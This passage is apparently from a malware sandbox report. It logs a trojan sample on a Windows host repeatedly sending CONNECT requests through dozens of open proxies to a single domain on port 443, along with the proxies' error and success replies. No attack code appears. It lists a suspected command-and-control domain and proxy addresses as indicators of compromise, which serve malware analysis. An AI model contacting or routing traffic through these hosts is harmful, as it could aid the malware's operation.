                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.755542994 CET239INHTTP/1.0 503 unknown method
                                                                                Connection: close
                                                                                Content-Length: 119
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Expires: 0
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 33 3a 20 75 6e 6b 6e 6f 77 6e 20 6d 65 74 68 6f 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 33 3a 20 75 6e 6b 6e 6f 77 6e 20 6d 65 74 68 6f 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <html><head><title>Error 503: unknown method</title></head><body><h1>Error 503: unknown method</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1196192.168.2.85354836.67.77.4131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.515115976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1197192.168.2.852865162.241.40.187512475828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.526315928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.694823027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.695238113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.695601940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:55.739568949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:07.741677999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:19.913538933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1198192.168.2.853597172.67.25.204805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.532305002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.620150089 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:31 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1199192.168.2.853573154.12.178.107299855828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.533828020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1200192.168.2.853592104.244.75.78315345828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.557730913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1201192.168.2.85358779.110.196.14580815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.562994003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1202192.168.2.853601184.170.248.541455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.573357105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1203192.168.2.853343139.129.202.244805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.597909927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.001399994 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 23 Feb 2024 13:28:31 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1204192.168.2.851297138.197.92.110213465828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.599220037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.695003033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.695233107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.695718050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1205192.168.2.85142551.75.126.150229355828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.605751038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1206192.168.2.853595200.41.148.2120005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.656368017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1207192.168.2.853480216.218.240.46483245828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.666717052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1208192.168.2.85358142.193.58.9680805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.667246103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.812880039 CET58INHTTP/1.1 200 Connection established
                                                                                Connection: close


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1209192.168.2.853622147.124.212.31305085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.667474985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1210192.168.2.853603158.160.141.13910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.675256014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.889262915 CET38INHTTP/1.1 200 OK
                                                                                content-length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1211192.168.2.85342294.131.14.6631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.684091091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.910979033 CET39INHTTP/1.0 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1212192.168.2.85361667.201.33.10252835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.689928055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1213192.168.2.851437164.163.21.1482915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.700109959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1214192.168.2.852936176.120.32.13556785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.705272913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1215192.168.2.85348127.65.116.24310805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.749574900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1216192.168.2.853643163.172.137.49163795828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.798474073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.288702011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.898200035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.085655928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.250602007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.389447927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.581784010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.789156914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1217192.168.2.853644109.69.0.17956785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.821310043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1218192.168.2.853660172.67.181.103805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.822354078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.910959005 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:31 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1219192.168.2.853469103.109.59.17280815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.822926998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.224284887 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1220192.168.2.853645167.71.5.8331285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.833367109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.011265039 CET28INHTTP/1.1 400 Bad Request


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1221192.168.2.85362358.234.116.19781935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.833543062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1222192.168.2.853663104.25.42.178805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.869497061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.956542015 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:31 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1223192.168.2.851343194.233.78.142335515828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.913482904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.046524048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.185952902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.289148092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1224192.168.2.853661104.244.75.78315345828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.938431978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1225192.168.2.85363814.103.26.5380005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.961694956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1226192.168.2.853671185.162.229.127805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.972265005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.060647964 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1227192.168.2.853678104.16.104.12805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.008696079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.096627951 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1228192.168.2.85366579.110.196.14580815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.025384903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1229192.168.2.852970159.223.71.71605125828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.052191973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
